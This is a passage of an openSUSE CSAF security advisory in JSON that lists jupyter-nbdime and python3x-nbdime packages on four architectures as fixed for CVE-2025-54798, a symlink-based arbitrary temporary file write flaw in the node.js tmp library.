"url": "https://www.suse.com/security/cve/CVE-2025-54798/"
}
],
"title": "jupyter-nbdime-7.0.2-23.1 on GA media",
"tracking": {
"current_release_date": "2025-08-29T00:00:00Z",
"generator": {
"date": "2025-08-29T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15502-1",
"initial_release_date": "2025-08-29T00:00:00Z",
"revision_history": [
{
"date": "2025-08-29T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.aarch64",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.aarch64",
"product_id": "jupyter-nbdime-7.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.aarch64",
"product": {
"name": "python311-nbdime-4.0.2-23.1.aarch64",
"product_id": "python311-nbdime-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.aarch64",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.aarch64",
"product_id": "python311-nbdime-git-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.aarch64",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.aarch64",
"product_id": "python311-nbdime-hg-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.aarch64",
"product": {
"name": "python312-nbdime-4.0.2-23.1.aarch64",
"product_id": "python312-nbdime-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.aarch64",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.aarch64",
"product_id": "python312-nbdime-git-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.aarch64",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.aarch64",
"product_id": "python312-nbdime-hg-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.aarch64",
"product": {
"name": "python313-nbdime-4.0.2-23.1.aarch64",
"product_id": "python313-nbdime-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.aarch64",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.aarch64",
"product_id": "python313-nbdime-git-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.aarch64",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.aarch64",
"product_id": "python313-nbdime-hg-4.0.2-23.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.ppc64le",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.ppc64le",
"product_id": "jupyter-nbdime-7.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.ppc64le",
"product": {
"name": "python311-nbdime-4.0.2-23.1.ppc64le",
"product_id": "python311-nbdime-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.ppc64le",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.ppc64le",
"product_id": "python311-nbdime-git-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.ppc64le",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.ppc64le",
"product_id": "python311-nbdime-hg-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.ppc64le",
"product": {
"name": "python312-nbdime-4.0.2-23.1.ppc64le",
"product_id": "python312-nbdime-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.ppc64le",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.ppc64le",
"product_id": "python312-nbdime-git-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.ppc64le",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.ppc64le",
"product_id": "python312-nbdime-hg-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.ppc64le",
"product": {
"name": "python313-nbdime-4.0.2-23.1.ppc64le",
"product_id": "python313-nbdime-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.ppc64le",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.ppc64le",
"product_id": "python313-nbdime-git-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.ppc64le",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.ppc64le",
"product_id": "python313-nbdime-hg-4.0.2-23.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.s390x",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.s390x",
"product_id": "jupyter-nbdime-7.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.s390x",
"product": {
"name": "python311-nbdime-4.0.2-23.1.s390x",
"product_id": "python311-nbdime-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.s390x",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.s390x",
"product_id": "python311-nbdime-git-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.s390x",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.s390x",
"product_id": "python311-nbdime-hg-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.s390x",
"product": {
"name": "python312-nbdime-4.0.2-23.1.s390x",
"product_id": "python312-nbdime-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.s390x",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.s390x",
"product_id": "python312-nbdime-git-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.s390x",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.s390x",
"product_id": "python312-nbdime-hg-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.s390x",
"product": {
"name": "python313-nbdime-4.0.2-23.1.s390x",
"product_id": "python313-nbdime-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.s390x",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.s390x",
"product_id": "python313-nbdime-git-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.s390x",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.s390x",
"product_id": "python313-nbdime-hg-4.0.2-23.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.x86_64",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.x86_64",
"product_id": "jupyter-nbdime-7.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.x86_64",
"product": {
"name": "python311-nbdime-4.0.2-23.1.x86_64",
"product_id": "python311-nbdime-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.x86_64",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.x86_64",
"product_id": "python311-nbdime-git-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.x86_64",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.x86_64",
"product_id": "python311-nbdime-hg-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.x86_64",
"product": {
"name": "python312-nbdime-4.0.2-23.1.x86_64",
"product_id": "python312-nbdime-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.x86_64",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.x86_64",
"product_id": "python312-nbdime-git-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.x86_64",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.x86_64",
"product_id": "python312-nbdime-hg-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.x86_64",
"product": {
"name": "python313-nbdime-4.0.2-23.1.x86_64",
"product_id": "python313-nbdime-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.x86_64",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.x86_64",
"product_id": "python313-nbdime-git-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.x86_64",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.x86_64",
"product_id": "python313-nbdime-hg-4.0.2-23.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64"
},
"product_reference": "python311-nbdime-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le"
},
"product_reference": "python311-nbdime-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x"
},
"product_reference": "python311-nbdime-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64"
},
"product_reference": "python311-nbdime-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64"
},
"product_reference": "python312-nbdime-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le"
},
"product_reference": "python312-nbdime-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x"
},
"product_reference": "python312-nbdime-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64"
},
"product_reference": "python312-nbdime-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64"
},
"product_reference": "python313-nbdime-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le"
},
"product_reference": "python313-nbdime-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x"
},
"product_reference": "python313-nbdime-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64"
},
"product_reference": "python313-nbdime-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-54798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54798"
}
],
"notes": [
{
"category": "general",
"text": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x",
